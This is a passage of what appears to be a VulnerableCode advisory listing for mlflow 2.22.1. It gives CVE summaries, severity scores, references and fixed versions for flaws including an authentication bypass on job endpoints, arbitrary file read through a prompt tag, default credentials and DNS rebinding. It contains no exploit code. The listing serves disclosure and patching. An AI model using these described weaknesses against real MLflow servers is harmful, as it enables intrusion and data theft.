Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:pypi/mlflow@2.22.1
Typepypi
Namespace
Namemlflow
Version2.22.1
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version3.11.0
Latest_non_vulnerable_version3.11.1
Affected_by_vulnerabilities
0
url VCID-1bya-32tr-jfhz
vulnerability_id VCID-1bya-32tr-jfhz
summary A flaw has been found in MLflow up to 3.10.0. This issue affects the function mlflow.data.digest_utils of the file mlflow/data/digest_utils.py of the component Dataset Digest Computation. This manipulation causes use of weak hash. It is possible to launch the attack on the local host. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-10803.json
reference_id
reference_type
scores
0
value 2.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-10803.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-10803
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.0044
published_at 2026-06-14T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.00431
published_at 2026-06-13T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.00432
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-10803
2
reference_url https://github.com/mlflow/mlflow/issues/22419
reference_id 22419
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://github.com/mlflow/mlflow/issues/22419
3
reference_url https://github.com/mlflow/mlflow/pull/22420
reference_id 22420
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://github.com/mlflow/mlflow/pull/22420
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2484755
reference_id 2484755
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2484755
5
reference_url https://vuldb.com/vuln/368252
reference_id 368252
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/vuln/368252
6
reference_url https://vuldb.com/submit/831462
reference_id 831462
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/submit/831462
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*
8
reference_url https://vuldb.com/vuln/368252/cti
reference_id cti
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/vuln/368252/cti
9
reference_url https://vuldb.com/cve/CVE-2026-10803
reference_id CVE-2026-10803
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://vuldb.com/cve/CVE-2026-10803
10
reference_url https://github.com/mlflow/mlflow/
reference_id mlflow
reference_type
scores
0
value 2.4
scoring_system cvssv2
scoring_elements AV:L/AC:H/Au:S/C:N/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 3.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
2
value 3.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L/E:P/RL:X/RC:R
3
value 1.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
4
value 2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-04T12:55:46Z/
url https://github.com/mlflow/mlflow/
fixed_packages
0
url pkg:pypi/mlflow@3.10.1
purl pkg:pypi/mlflow@3.10.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-24ct-fu3q-gbgj
1
vulnerability VCID-fxtg-yezw-hfhr
2
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.10.1
aliases BIT-mlflow-2026-10803, CVE-2026-10803, PYSEC-2026-195
risk_score 1.6
exploitability 0.5
weighted_severity 3.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1bya-32tr-jfhz
1
url VCID-24ct-fu3q-gbgj
vulnerability_id VCID-24ct-fu3q-gbgj
summary In mlflow/mlflow, the FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization when the `basic-auth` app is enabled. This vulnerability affects the latest version of the repository. If job execution is enabled (`MLFLOW_SERVER_ENABLE_JOB_EXECUTION=true`) and any job function is allowlisted, any network client can submit, read, search, and cancel jobs without credentials, bypassing basic-auth entirely. This can lead to unauthenticated remote code execution if allowed jobs perform privileged actions such as shell execution or filesystem changes. Even if jobs are deemed safe, this still constitutes an authentication bypass, potentially resulting in job spam, denial of service (DoS), or data exposure in job results.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0545.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0545.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0545
reference_id
reference_type
scores
0
value 0.11241
scoring_system epss
scoring_elements 0.93709
published_at 2026-06-14T12:55:00Z
1
value 0.11241
scoring_system epss
scoring_elements 0.93683
published_at 2026-06-11T12:55:00Z
2
value 0.11241
scoring_system epss
scoring_elements 0.93707
published_at 2026-06-13T12:55:00Z
3
value 0.11241
scoring_system epss
scoring_elements 0.93703
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0545
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0545
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0545
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2454889
reference_id 2454889
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2454889
5
reference_url https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8
reference_id b2e5b028-9541-4d29-8703-a76f1a3734d8
reference_type
scores
0
value 9.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-03T17:48:47Z/
url https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8
6
reference_url https://github.com/advisories/GHSA-7qhf-v65m-g5f3
reference_id GHSA-7qhf-v65m-g5f3
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7qhf-v65m-g5f3
fixed_packages
0
url pkg:pypi/mlflow@3.11.0rc0
purl pkg:pypi/mlflow@3.11.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fxtg-yezw-hfhr
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.0rc0
aliases CVE-2026-0545, GHSA-7qhf-v65m-g5f3
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-24ct-fu3q-gbgj
2
url VCID-4jqc-vp49-2ybf
vulnerability_id VCID-4jqc-vp49-2ybf
summary A vulnerability in the `_create_model_version()` handler of `mlflow/server/handlers.py` in mlflow/mlflow versions 3.9.0 and earlier allows an unauthenticated remote attacker to read arbitrary files from the server's filesystem. The issue arises when a `CreateModelVersion` request includes the tag `mlflow.prompt.is_prompt`, which bypasses source path validation. This enables an attacker to store an arbitrary local filesystem path as the model version source. The `get_model_version_artifact_handler()` function later uses this source to serve files without verifying the model version's prompt status, leading to a complete confidentiality compromise. This issue is fixed in version 3.10.0.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2614.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2614.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2614
reference_id
reference_type
scores
0
value 0.0005
scoring_system epss
scoring_elements 0.16113
published_at 2026-06-11T12:55:00Z
1
value 0.00055
scoring_system epss
scoring_elements 0.17684
published_at 2026-06-12T12:55:00Z
2
value 0.00055
scoring_system epss
scoring_elements 0.17701
published_at 2026-06-13T12:55:00Z
3
value 0.00055
scoring_system epss
scoring_elements 0.17676
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2614
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2614
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2614
4
reference_url https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6
reference_id 19380271-3fbf-4beb-987e-6fd7069c55e6
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:32:48Z/
url https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2469309
reference_id 2469309
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2469309
6
reference_url https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
reference_id 6e801f4259d96804c73107315b24cef0f6aa115a
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:32:48Z/
url https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
7
reference_url https://github.com/advisories/GHSA-42h5-h8qh-vv9v
reference_id GHSA-42h5-h8qh-vv9v
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-42h5-h8qh-vv9v
fixed_packages
0
url pkg:pypi/mlflow@3.10.0
purl pkg:pypi/mlflow@3.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-fxtg-yezw-hfhr
3
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.10.0
aliases CVE-2026-2614, GHSA-42h5-h8qh-vv9v
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4jqc-vp49-2ybf
3
url VCID-4jya-uh8s-4ycv
vulnerability_id VCID-4jya-uh8s-4ycv
summary 
MLflow Use of Default Password Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of MLflow. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the basic_auth.ini file. The file contains hard-coded default credentials. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of the administrator. Was ZDI-CAN-28256.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2635.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2635.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2635
reference_id
reference_type
scores
0
value 0.01519
scoring_system epss
scoring_elements 0.81642
published_at 2026-06-11T12:55:00Z
1
value 0.01519
scoring_system epss
scoring_elements 0.81703
published_at 2026-06-14T12:55:00Z
2
value 0.01519
scoring_system epss
scoring_elements 0.81711
published_at 2026-06-13T12:55:00Z
3
value 0.01519
scoring_system epss
scoring_elements 0.81702
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2635
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
4
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
5
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-111
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-26-111
6
reference_url https://github.com/mlflow/mlflow/pull/19260
reference_id 19260
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T15:17:25Z/
url https://github.com/mlflow/mlflow/pull/19260
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2441514
reference_id 2441514
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2441514
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2635
reference_id CVE-2026-2635
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2635
9
reference_url https://github.com/advisories/GHSA-gq3w-7jj3-x7gr
reference_id GHSA-gq3w-7jj3-x7gr
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gq3w-7jj3-x7gr
10
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-111/
reference_id ZDI-26-111
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T15:17:25Z/
url https://www.zerodayinitiative.com/advisories/ZDI-26-111/
fixed_packages
0
url pkg:pypi/mlflow@3.8.0rc0
purl pkg:pypi/mlflow@3.8.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.0rc0
aliases CVE-2026-2635, GHSA-gq3w-7jj3-x7gr
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4jya-uh8s-4ycv
4
url VCID-7ykf-b93e-w7am
vulnerability_id VCID-7ykf-b93e-w7am
summary MLFlow versions up to and including 3.4.0 are vulnerable to DNS rebinding attacks due to a lack of Origin header validation in the MLFlow REST server. This vulnerability allows malicious websites to bypass Same-Origin Policy protections and execute unauthorized calls against REST endpoints. An attacker can query, update, and delete experiments via the affected endpoints, leading to potential data exfiltration, destruction, or manipulation. The issue is resolved in version 3.5.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-14279
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05807
published_at 2026-06-12T12:55:00Z
1
value 0.0002
scoring_system epss
scoring_elements 0.05788
published_at 2026-06-14T12:55:00Z
2
value 0.0002
scoring_system epss
scoring_elements 0.05785
published_at 2026-06-11T12:55:00Z
3
value 0.0002
scoring_system epss
scoring_elements 0.05798
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-14279
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://github.com/mlflow/mlflow/pull/17910
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/pull/17910
3
reference_url https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3
reference_id b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-12T14:54:23Z/
url https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-14279
reference_id CVE-2025-14279
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-14279
5
reference_url https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108
reference_id ef478f72-2e4f-44dc-8055-fc06bef03108
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-12T14:54:23Z/
url https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108
6
reference_url https://github.com/advisories/GHSA-pgqp-8h46-6x4j
reference_id GHSA-pgqp-8h46-6x4j
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pgqp-8h46-6x4j
fixed_packages
0
url pkg:pypi/mlflow@3.5.0
purl pkg:pypi/mlflow@3.5.0
is_vulnerable true
affected_by_vulnerabilities
0
